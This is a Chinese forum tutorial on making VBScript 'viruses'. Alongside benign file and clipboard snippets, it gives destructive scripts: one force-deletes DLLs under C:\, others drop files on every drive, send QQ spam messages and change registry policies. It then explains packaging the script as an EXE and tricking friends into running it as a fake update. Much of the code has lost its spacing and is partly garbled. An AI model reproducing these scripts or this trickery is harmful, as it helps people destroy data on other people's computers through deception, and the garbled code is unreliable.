TA的每日心情 | 无聊
2020-2-16 10:37 |
|---|
签到天数: 5 天 [LV.2]偶尔看看I
|
01前言:首先,我是从冰儿站来的,所有的技术都是从冰儿站学来的,如果你对我有偏见,要么你别看,要么我滚蛋。好了,我今天教的是关于vbs的制作,后面有个更厉害的利器。
02教程:vbs病毒在抖音上大家应该都看过了,但是你知道真正的vbs病毒咋做吗?首先,我们需要一台模拟机最好是VMware的模拟机(如果我没被喷死喷滚蛋的话明天会发vmware模拟机的教程)之后,我们打开控制面板-外观与个性化-文件夹选项隐藏已知文件类型的拓展名,选择关闭
![(~0BEA]W]M@O544]338HDG6.png](data/attachment/forum/202002/13/084229mwqi9gaqi9n8aij9.png "(~0BEA]W]M@O544]338HDG6.png")
如果你到了这一步,那就很快可以完成了。首先我们来到桌面,新建一个文本文档然后把后缀(拓展名)txt改成vbs,点击确定。右键那个vbs文件,点击编辑。
03:代码(如果有编程基础会更好,其实vbs代码逻辑很像js):
(fol)
Dimi
((i))="txt"Then
(i,8,0)
Next
获取计算机所有盘符=CreateObject("scripting.filesystemobject")
Setobjdrives=fso.Drives'取得当前计算机的所有磁盘驱动器
ForEachobjdriveInobjdrives'遍历磁盘
MsgBoxobjdrive
Next
VBS给本机所有磁盘根目录创建文件OnErrorResumeNext
Setfso=CreateObject("Scripting.FileSystemObject")
Setgangzis=fso.Drives'取得当前计算机的所有磁盘驱动器
ForEachgangziIngangzis'遍历磁盘
SetTestFile=fso.CreateTextFile(""gangzi"\新建文件夹.vbs",Ture)
TestFile.WriteLine("ByCik")
TestFile.Close
Next
VBS遍历本机全盘找到所有123.exe然后给他们改名321.exeSetfs=CreateObject("Scripting.FileSystemObject")
ForEachdriveInfs.drives
fstraversaldrive.rootfolder
Next
Subfstraversal(byvalthis)
ForEachfolderInthis.subfolders
fstraversalfolder
Next
Setfiles=this.files
ForEachfileInfiles
Iffile.name="123.exe"Thenfile.name="321.exe"
Next
EndSub
VBS写入代码到粘贴板先说明一下VBS写内容到粘贴板网上千篇一律都是通过
InternetExplorer.Application对象来实现但是缺点是在默认浏览器为非IE中会弹
出浏览器所以费了很大的劲找到了这个代码来实现str="这里是你要复制到剪贴板的字符串"
Setws=wscript.createobject("wscript.shell")
ws.run"mshta
vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""str""""+")(clo
se)",0,trueQQ自动发消息OnErrorResumeNext
str="我是笨蛋/qq"
SetWshShell=WScript.CreateObject("WScript.Shell")
WshShell.run"mshta
vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""str""""+")(clo
se)",0
WshShell.run
"tencent://message/?Menu=yesuin=20016964Site=Service=200sigT=2a39fb276
d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0
,true
WScript.Sleep3000
WshShell.SendKeys"^v"
WshShell.SendKeys"%s"
VBS隐藏文件SetobjFSO=CreateObject("Scripting.FileSystemObject")
SetobjFile=objFSO.GetFile("F:\软件大赛\show.txt")
IfobjFile.Attributes=objFile.AttributesAND2Then
objFile.Attributes=objFile.AttributesXOR2
EndIf
VBS生成随机数521是生成规则不同的数字生成的规则不一样可以用于其它用途Randomize520
point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1))
msgboxjoin(point,"")
VBS删除桌面IE图标非快捷方式SetoShell=CreateObject("WScript.Shell")
oShell.RegWrite
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoIntern
etIcon",1,"REG_DWORD"
VBS获取自身文件名MyName=WScript.ScriptName
msgboxMyName
MyFullName=WScript.ScriptFullName
msgboxMyFullName
VBS读取Unicode编码的文件SetobjFSO=CreateObject("Scripting.FileSystemObject")
SetobjFile=objFSO.OpenTextFile("gangzi.txt",1,False,-1)
strText=objFile.ReadAll
objFile.Close
Wscript.EchostrText
VBS读取指定编码的文件默认为uft-8gangzi变量是要读取文件的路径setstm2=createobject("ADODB.Stream")
stm2.charset=GBK"utf-8"
stm2.Open
stm2.LoadFromFilegangzi
readfile=stm2.ReadText
MsgBoxreadfile
VBS禁用组策略SetoShell=CreateObject("WScript.Shell")
oShell.RegWrite
"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnap
ins",1,"REG_DWORD"
VBS写指定编码的文件默认为uft-8gangzi变量是要读取文件的路径gangzi2是
内容变量cik="1.txt"
cik2="2.txt"
SetStm1=CreateObject("ADODB.Stream")
Stm1.Type=2
Stm1.Open
Stm1.charset=GBK"UTF-8"
Stm1.Position=Stm1.Size
Stm1.WriteTextcik2
Stm1.SaveToFilecik,2
Stm1.Close
setStm1=nothing
VBS获取当前目录下所有文件夹名字不包括子文件夹Setfso=WScript.CreateObject("Scripting.Filesystemobject")
Setf=fso.GetFolder(fso.GetAbsolutePathName("."))
Setfolders=f.SubFolders
ForEachfoInfolders
wsh.echofo.Name
NextVBS获取指定目录下所有文件夹名字包括子文件夹Dimt
Setfso=WScript.CreateObject("scripting.filesystemobject")
Setfs=fso.GetFolder("d:\")
WScript.Echoaa(fs)
Functionaa(n)
Setf=n.subfolders
ForEachuuInf
Setop=fso.GetFolder(uu.path)
t=tvbCrLfop.path
Callaa(op)
Next
aa=t
EndFunction
VBS创建.URL文件IconIndex参数不同的数字代表不同的图标具体请参照
SHELL32.dll里面的所有图标
do
。。。。。
loop
中间写你想写的,你想写的就会无限循环
这里给大家写个vbs病毒(杀伤力极强,打开非死即伤,请在模拟机打开):
OnError Resume Next
Setfso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile"C:/*.dll", True
Setfso = Nothing
如果你没用模拟机打开的话,恭喜你,喜提新电脑一台。
04大杀器:
任务管理器:如果你中了朋友的vbs病毒的话,我教你咋解决(除了我刚刚给你的病毒):
首先,我们打开任务管理器,找到wscript.exe,右键结束进程即可。
vbs改exe:大家有没有发现,傻子才会点vbs后缀的文件,这可咋办,不慌,我来教你:
首先,我们下载scriptcrypor(网址https://www.abyssmedia.com/scriptcryptor/),打开这个软件,点击file,点击open(没错,我在教文盲),打开你写好的vbs文件,再点file那一行的下面一行倒数第三个,就可以转换成exe文件,这个时候你就可以骗你朋友以众多理由类似更新或者升级防火墙等,让他打开。然后就很有劲(友尽)了。
那么怎么关掉exe文件呢,还是要用任务管理器,只是你要找到你的文件的名字的选项。
05结尾:如果你有什么问题可以问我
|
评分
-
查看全部评分
|
发表于 2020-2-13 09:21:24
发表于 2020-2-13 19:08:09
